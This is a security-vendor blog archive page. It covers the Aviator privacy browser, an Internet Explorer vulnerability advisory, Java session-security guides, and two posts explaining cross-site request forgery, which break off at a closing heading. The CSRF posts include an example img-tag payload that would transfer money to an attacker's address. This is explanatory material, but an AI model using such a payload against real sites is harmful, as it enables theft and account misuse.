Tag Archives: security

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator unitizes open source software via Chromium, don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, of which Aviator is derived, contains a wide variety of OSS licenses. As can be seen here using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, when and/if we make a change to the GPL or similar licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive and requests for a Windows, Linux and even open source versions are pouring in, so we are definitely determining where to focus our resources on what should come next, but there is not definite timeframe yet of when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself, and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident in using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising networks’ servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers attempt to take advantage of the fastest method of rendering they can. These APIs are sometimes unsupported by the OS and are called “private APIs”. Apple does not support these APIs because they may change and they don’t want to be held accountable for when things break. As a result, while they allow people to use their undocumented and highly speed private APIs, they don’t allow people to distribute applications that use private APIs. We can speculate the reason being that users are likely to think it’s Apple’s fault as opposed to the program when things break. So after about a month of wrestling with it, we decided that for now, we’d avoid using the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?
Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the mean time, we’re mostly interested in offering a browser that security and privacy-conscious people want to use.

Have you gotten and feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, others negative. In either case, we’re most interested in server the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market share leading browsers cannot do this adequately. This is an every day threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, even asked us what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent-updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations that websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the amount of session states you have open – due to an intentional lack of persistence in the browser over different sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be connected to from the outside (NAT). Exploitation may lead to simple reconnaissance of internet networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible to block any bit of Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to be able to get to, Connection Control allows the user to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well-known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite, “Search anonymously. Find instantly.” We felt that that was a much better default option. Of course if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers will tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so could possibly leak sensitive information such as the search keywords used, internal IPs/hostnames, session tokens, etc. These leaks are often caused by the referring URL and offer little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (E.g. Flash and Java) are a source for tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection. Your browser might be secure, but the plug-ins are not and one must update constantly. Then of course all those annoying sounds and visuals made by plug-ins which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just one-click on the puzzle piece. If you want a website to always load the plug-ins, that’s a configuration change as well. “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / login to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we have defaulted to DuckDuckGo as a search engine, we have limited what is sent in the browser to Google to protect your privacy. If you chose to use Google services, that is your choice. If you chose not to though, it can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track”, we figure it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.

We so far have appreciated the response to WhiteHat Aviator and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Introducing WhiteHat Aviator – A Safer Web Browser

Jeremiah Grossman and I have been publicly discussing browser security and privacy, or the lack thereof, for many years. We’ve shared the issues hundreds of times at conferences, in blog posts, on Twitter, in white papers, and in the press. As the adage goes, “If you’re not paying for something, you’re not the customer; you’re the product being sold.” Browsers are no different, and the major vendors (Google, Mozilla, Microsoft) simply don’t want to make the changes necessary to offer a satisfactorily secure and private browser.

Before I go any further, it’s important to understand that it’s NOT that the browser vendors (Google, Mozilla, and Microsoft) don’t grasp or appreciate what plagues their software. They understand the issues quite well. Most of the time they actually nod their heads and even agree with us! This naturally invites the question: “why aren’t the necessary changes made to fix things and protect people?”

The answer is simple. Browser vendors (Google, Mozilla, and Microsoft) choose not to make these changes because doing so would run the risk of hurting their market share and their ability to make money. You see, offering what we believe is a reasonably secure and privacy-protecting browser requires breaking the Web, even though it’s just a little and in ways few people would notice. As just one example of many, let’s discuss the removal of ads.

The online advertising industry is promoted as a means of helping businesses reach an interested target audience. But tens of millions of people find these ads to be annoying at best, and many find them highly objectionable. The targeting and the assumptions behind them are often at fault: children may be exposed to ads for adult sites, and the targeting is often based on bias and stereotypes that can cause offense. Moreover, these ads can be used to track you across the web, are often laden with malicious malware, and can point those who click on them to scams.

One would think that people who don’t want to click on ads are not the kind of people the ad industry wants anyway. So if browser vendors offered a feature capable of blocking ads by default, it would increase the user satisfaction for millions, provide a more secure and privacy-protecting online experience, and ensure that advertisements were seen by people who would react positively, rather than negatively, to the ads. And yet not a single browser vendor offers ad blocking, instead relying on optional third-party plugins, because this breaks their business model and how they make money. Current incentives between the user and browser vendor are misaligned. People simply aren’t safe online when their browser vendor profits from ads.

I could go on and give a dozen more examples like this, but rather than continuing to beat a drum that no one with the power to make the change is willing to listen to – we decided it was time to draw a line in the sand, and to start making the Web work the way we think it should: a way that protects people. That said, I want to share publicly for the first time some details about WhiteHat Aviator, our own full-featured web browser, which was until now a top secret internal project from our WhiteHat Security Labs team. Originally, Aviator started out as an experiment by our Labs team to test our many Web security and privacy theories, but today Aviator is the browser given to all WhiteHat employees. Jeremiah, myself, and many others at WhiteHat use Aviator daily as our primary browser. We’re often asked by those outside the company what browser we use, to which we have answered, “our own.” After years of research, development, and testing we’ve finally arrived at a version that’s mature enough for public consumption (OS X). Now you can use the same browser that we do.

WhiteHat Security has no interest or stake in the online advertising industry, so we can offer a browser free of ulterior motives. What you see is what you get. We aren’t interested in tracking you or your browsing history, or in letting anyone else have that information either.

Aviator is designed for the every day person who really values their online security and privacy:

  • We bundled Aviator with Disconnect to remove ads and tracking
  • Aviator is always in private mode
  • Each tab is sandboxed (a sandbox provides controls to help prevent one program from making changes to others, or to your environment)
  • We strip out referring URLs across domains to protect your privacy
  • Flash and Java are click-to-play – greatly reducing the risk of drive-by downloads
  • We block access to websites behind your firewall to prevent Intranet hacking

Default settings in Aviator are set to protect your security and your privacy.

We hope you enjoy using Aviator as much as we’ve enjoyed building it. If people like it, we will create a Windows version as well and we’ll add additional privacy and security features. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Browser Wars to Browser Foes – MS13-069

Microsoft has just published a high-level threat 0-day vulnerability for all versions of Internet Explorer 6.0 and greater and affecting all operating system higher then Windows XP service pack 3. This vulnerability uses a corrupted memory object to remotely execute code that runs on the victim’s machine with the current users privileges. More information about how the vulnerability is exploited can be found at Microsoft here.

All that is required from the victim is to click a malicious link hosted by the attacker to become exploited; this in turn runs the attacker’s executing code and gives the attacker access to the machine.

This attack can still be sent through social media sites, chat messages, email, and malicious websites. As a precaution it may be wise to change the default browser to something other than Internet Explorer until the affected machine is patched. The instructions from Microsoft to change the default browser here Windows 7 And Windows XP.

The scope of users affected is very high, since the Microsoft Windows Operating Systems and Internet Explorer have been the de facto standard for more then a decade. Since Internet Explorer ships as the only browser in Windows it’s very easy not to bother installing a different browser. Internet Explorer users still make up roughly a third of browser usage average, when comparing Internet Explorer to Chrome and Firefox.

Internet Explorer on Windows Servers above 2003 are at a lower risk because they run in a default enhanced security configuration, and it’s strongly discouraged in security to be browsing the internet from Windows server or any server for that matter.

Solution:

Patching can be a hectic task for admins that are using Internet Explorer dependently, but should be done immediately to prevent exposure.

The official instructions from Microsoft Suggested Actions:

General Information for all users

Enhanced Mitigation Experience ToolKit

Here are some statistical results showing the popularity/average browser and operating usage across the world:

https://www.statcounter.com

https://www.netmarketshare.com

https://www.w3counter.com

https://www.sitepoint.com


20,000

20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it any justice though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly ;).) In fairness, what they couldn’t fully appreciate then is “Web security” in terms of what it really takes to scale, which means they truly didn’t understand “Web security.”

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third-party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms would maybe have many as 50 consultants. So collectively, the entire company could only get to about 2,000 websites annually. This is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of their business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what the one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about, scale. If any solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off none-the-less.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean we would be processing more than 7TB of data over millions of dollars of infrastructure per week. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months with. And that is a very exciting possibility.

WhiteHat to Host Webinar—Beyond the Breach: Insights Into the Hidden Cost of a Web Security Breach

On Wednesday, September 12, at 11:00 AM PT, join WhiteHat Security’s Gillis Jones as he shares his research into the real financial implications of a website hack. On his journey through the business-side of Web security, Gillis uncovered bleak realities including discrepancies in accounting practices; a lack of consistent disclosure policies to address Web hacks; and gross under-reporting of financial losses once a breach is disclosed.

Gillis will also share cost-analysis formulas he developed while researching website breaches, as well as the specific costs of a breach in each of these areas:

  1. Personnel
  2. Technical, Infrastructure & Immediate Losses of Income
  3. Compliance
  4. Damaged, Destroyed or Stolen Hardware
  5. Customer Turnover & Loss of Customer Trust
  6. “Customer Management” After the Breach
  7. Fines & Lawsuits
  8. Public Relations “Damage Control”

To register for the webinar, please visit this link: https://reg.whitehatsec.com/forms/WEBINARbreach0912

Session Cookie Secure Flag Java

What is it and why should I care?
Session cookies (or, to Java folks, the cookie containing the JSESSIONID) are the cookies used to perform session management for Web applications. These cookies hold the reference to the session identifier for a given user, and the same identifier is maintained server-side along with any session-scoped data related to that session id. Because cookies are transmitted on every request, they are the most common mechanism used for session management in Web applications.

The secure flag is an additional flag that you can set on a cookie to instruct the browser to send this cookie ONLY when on encrypted HTTPS transmissions (i.e. NEVER send the cookie on unencrypted HTTP transmissions). This ensures that your session cookie is not visible to an attacker in, for instance, a man-in-the-middle (MITM) attack. While a secure flag is not the complete solution to secure session management, it is an important step in providing the security required.

What should I do about it?
The resolution here is quite simple. You must add the secure flag to your session cookie (and preferably to all cookies, because any requests to your site should be HTTPS, if possible).

Here’s an example of how a session cookie might look without the secure flag:

Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H;

And now, how the same session cookie would look with the secure flag:

Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; secure;

Not much to it. Obviously, you can do this manually, but if you’re working in a Java Servlet 3.0 or newer environment, a simple configuration setting in the web.xml will take care of this for you. You should add the snippet below to your web.xml.

<session-config>
<cookie-config>
<secure>true</secure>
</cookie-config>
</session-config>

As you can see, resolving this issue is quite simple. It should be on everyone’s //TODO list.

References
———–
http://blog.mozilla.com/webappsec/2011/03/31/enabling-browser-security-in-web-applications/

http://michael-coates.blogspot.com/2011/03/enabling-browser-security-in-web.html

https://www.owasp.org/index.php/SecureFlag

Session Fixation Prevention in Java

What is it and why should I care?
Session fixation, by most definitions, is a subclass of session hijacking. The most common basic flow is:

Step 1. Attacker gets a valid session ID from an application
Step 2. Attacker forces the victim to use that same session ID
Step 3. Attacker now knows the session ID that the victim is using and can gain access to the victim’s account

Step 2, which requires forcing the session ID on the victim, is the only real work the attacker needs to do. And even this action on the attacker’s part is often performed by simply sending the victim a link to a website with the session ID attached to the URL.

Obviously, one user being able to take over another user’s account is a serious issue, so…

What should I do about it?
Fortunately, resolving session fixation is usually fairly simple. The basic advice is:

Invalidate the user session once a successful login has occurred.

The usual basic flow to handle session fixation prevention looks like:

1. User enters correct credentials
2. System successfully authenticates user
3. Any existing session information that needs to be retained is moved to temporary location
4. Session is invalidated (HttpSession#invalidate())
5. New session is created (new session ID)
6. Any temporary data is restored to new session
7. User goes to successful login landing page using new session ID

A useful snippet of code is available from the ESAPI project that shows how to change the session identifier:

http://code.google.com/p/owasp-esapi-java/source/browse/trunk/src/main/java/org/owasp/esapi/reference/DefaultHTTPUtilities.java (look at the changeSessionIdentifier method)

There are other activities that you also can perform to provide additional assurance against session fixation. A number are listed below:

1. Check for session fixation if a user tries to login using a session ID that has been specifically invalidated (requires maintaining this list in some type of LRU cache)

2. Check for session fixation if a user tries to use an existing session ID already in use from another IP address (requires maintaining this data in some type of map)

3. If you notice these types of obvious malicious behavior, consider using something like AppSensor to protect your app, and to be aware of the attack

As you can see, session fixation is a serious issue, but has a pretty simple solution. Your best bet if possible is to include an appropriate solution in some “enterprise” framework (like ESAPI) so this solution applies evenly to all your applications.

References
———–
https://www.owasp.org/index.php/Session_fixation

http://www.acros.si/papers/session_fixation.pdf

http://cwe.mitre.org/data/definitions/384.html

http://projects.webappsec.org/w/page/13246960/Session%20Fixation

Cross-Site Request…Framing?

I admit, the title of this post is deliberately misleading. It’s really about Cross-Site Request Forgery (CSRF), but it does involve framing − just not the kind that you might be expecting.

Before jumping into the meat of things, let’s start off with an appetizer: What is Cross-Site Request Forgery? Rather than give you the “textbook” definition, I’ll just dive right into a real-world example.

Let’s say you visit http://www.news.test, and there is a logo on the homepage. Let’s also say that the logo is hosted at this address: http://images.example.com/newsLogo.jpg

When your browser loads the page at http://www.news.test, it’s likely you’ll see an image tag similar to the following: <img src=”http://images.example.com/newsLogo.jpg” />. When your browser renders that image, it must first place a request to images.example.com in order to retrieve the newsLogo.jpg resource. There’s certainly no harm in this, but for the sake of argument, we can confidently conclude that the www.news.test website forced your browser to place a request to images.example.com without your knowledge or explicit consent. Right?

Now, let’s suppose you visit http://www.news.test again, but this time there is an image tag that looks like this: <img src=”http://yourbanksite.example.org/transferMoney.php?toEmail=attacker@attacker.example.net&amount=99999.00″ />. As in the example above, when your browser loads the page at www.news.test and attempts to render the image tag, it is going to place a request to http://yourbanksite.example.org/transferMoney.php?toEmail=attacker@attacker.example.net&amount=99999.00. Your browser will place the malicious request without your knowledge, and if you are authenticated to yourbanksite.example.org when you visit www.news.test − assuming the yourbanksite.example.org web application is not protecting against a CSRF attack − your life savings and kid’s college fund will be gone in a flash.

This kind of attack succeeds because of a flaw in how the Internet inherently works. When your browser places a request to another site, any cookies that exist for that site are sent along with that request. Since authentication is typically handled through cookies, and your cookies are sent along with the malicious yourbanksite.example.org request, the yourbanksite.example.org application is going to see the request, recognize it as coming from an authenticated user (you), and thus honor/process the request.

There are more things to consider in this type of attack, but for the scope of this post, that’s all you really need to know now. While a CSRF attack is typically used to exploit an application that the victim is authenticated to, for the sake of what I’ll be discussing below, I’m more interested in the fact that a CSRF attack can be leveraged to force a victim’s browser to place arbitrary requests.

For additional reading material on CSRF, see this post on WhiteHat’s stance on CSRF, and the Web Application Security Consortium’s page on CSRF.

Ok… appetizer digested? Now for the main course…

Information is everything. It’s power. Privacy within Web applications, especially social media applications, is a war zone because information is such a profitable and appealing target. The smallest pieces of information − or *mis*information − in the wrong hands can cost you your identity, your job, or even your freedom.

Wherever there is a massive data flow of information, there is inevitably going to be monitoring and tracking. From advertising networks, to law enforcement organizations, to intelligence agencies, there is no shortage of people who are interested in obtaining information about you. I’m not just talking about your personal information, such as name, address, and phone number; I’m also referring to your browsing history, your social network engagements, and the kind of content you publish to, and consume from, “the cloud”.

Imagine your spouse or your boss opening up your browser’s history. Would you be concerned about what he/she sees?  Or perhaps the FBI confiscates your computer without warning.  Would you be worried about what they’d find?  Hopefully, the answer to both of those questions is “No”. But what if there was enough incriminating browser activity that you lose your job? Or a warrant is issued for your arrest? Or you even get labeled an “enemy combatant”?

Sounds kind of absurd, right? Well, how else would you explain your Google searches for “homemade explosives” and “President Obama upcoming trips”? Or your visits to underground child sex trafficking sites? Or your posts made to pro-Al Qaeda message forums? It would seem like you’ve been up to a whole lot of no good!

You may protest, “I would never do such things!” My point is that through the use of Cross-Site Request Forgery, an attacker can populate your browser’s history with all kinds of unpleasant Web traffic. Not to mention that the requests would actually be originating from, and traveling through, your home or office network. In fact, if you are lured to a malicious page and stay on it for more than a brief period of time (perhaps to watch an interesting 10-minute video), an attacker can simulate real, human behavior by spacing out the incriminating requests so the traffic resembles that of someone actually clicking on links and spending time on questionable pages (rather than have all malicious requests placed in rapid succession).

“But wait,” you say, “isn’t there a way to distinguish CSRF traffic from legitimate user traffic?” Well, the malicious requests will likely have a ‘Referer’ header set to the URL of the page where the attacks originated from, such as: “Referer: http://attacker.example.com/csrfattack.php”; however, consider the following:

1. The ‘Referer’ header is not tracked in your browser’s history, so that won’t help you in court.
2. Although I’d need to actually research how much detail is tracked by ISPs, government agencies, etc., I suspect that the ‘Referer’ is among the lesser-tracked items.  Besides, even if ‘Referer’ is tracked, an investigation would still be required to determine that the traffic was spoofed, and that’s a headache all on its own.
3. It may be possible to spoof the ‘Referer’ header by exploiting flaws in common technologies such as Java or Flash.
4. It is trivial to strip the ‘Referer’ altogether (kudos to Jeremiah Grossman for the tip).

The bottom line is, falling victim to this kind of CSRF attack can, at the very least, be an enormous inconvenience and a hassle to clear up. At its worst, being framed in this way − even if you’re eventually shown to be innocent − could destroy your reputation, your marriage, your career. False accusations can tarnish even the most innocent person’s reputation, especially if that person is a prominent figure and the media gets involved.

We live in an amazing age where information − and especially “news” − spreads like wildfire. With social media apps connecting billions of people worldwide − I’m thinking of Twitter in particular − breaking news can hit your cell phone before it even crosses a news anchor’s desk. If a celebrity, politician, or other public figure were to be targeted by this type of CSRF attack, his or her life could become exceedingly complicated − very quickly.

Consider the upcoming 2012 election: Such an attack could be just what a candidate needs to derail an opponent’s campaign progress. By the time the victim could prove the allegations false, the election could be long over!

Our world is rapidly changing, and each new generation becomes even more submerged in the technological realm than the one before. The more immersed in technology we become as a society, the more sophisticated and damaging attacks on our privacy and personal information will become. For example, it’s only a matter of time before hackers start getting into your fridge.

How long have you been reading this post? Five, maybe ten minutes? Did you switch over to another tab for a while half-way through? Or maybe you got up for a bit to get some food? Better check your browser history… you never know when − or from where − a CSRF attack might originate…

My First CSRF

My First Cross-Site Request Forgery Experience

A while back I was sifting through the posts of my friends on one of today’s popular social networking sites when I saw an odd video called “baby elephant giving birth” – or something to that effect – posted by several of my friends. This tingled my security-spidey senses. I knew something wasn’t legit, but I didn’t know exactly what. I decided to get on an old desktop I rarely use to check it out.

This is what happened: I click the link and am warned that I’m leaving the safety of socialnetworksite.com. The video opens in a new tab and begins to play. I close the tab and return to my profile to see that I had now posted “baby elephant giving birth” for all of my friends to see. I was a victim of CSRF.

How This Happened

When I originally logged into socialnetworksite.com, it stored my authenticated session within a cookie, and from then on the site would use that cookie to ensure that I am authorized. When I left socialnetworksite.com and loaded the new page, evilsite.example.com, a piece of script was embedded on the evilsite.example.com page that executed upon loading. That script contained a POST request to socialnetworksite.com that posted the baby elephant video to my profile. Because the POST request is sent from my browser, the server checked my browser’s cookies to make sure that I was authorized to make that request, and I was.

How to Protect Against This Occurring as a Developer

The most common and effective form of CSRF protection is with a randomly generated token that is assigned to the beginning of each session and that expires at the end of the active session. You can also generate and expire CSRF tokens for each POST. Some sites use the Viewstate property in ASP.Net sites, but because a Viewstate just records the input data of a form, you can potentially guess what those inputs would be. Granted that a Viewstate is better than no protection at all, a randomly generated CSRF Token is just as easy to implement and much more effective.

Note: If there is Cross-Site Scripting on the same site, the token used is irrelevant, because the attacker can grab the token from your cookies and make whatever authenticated requests he chooses.

How to Avoid This Occurring as a User

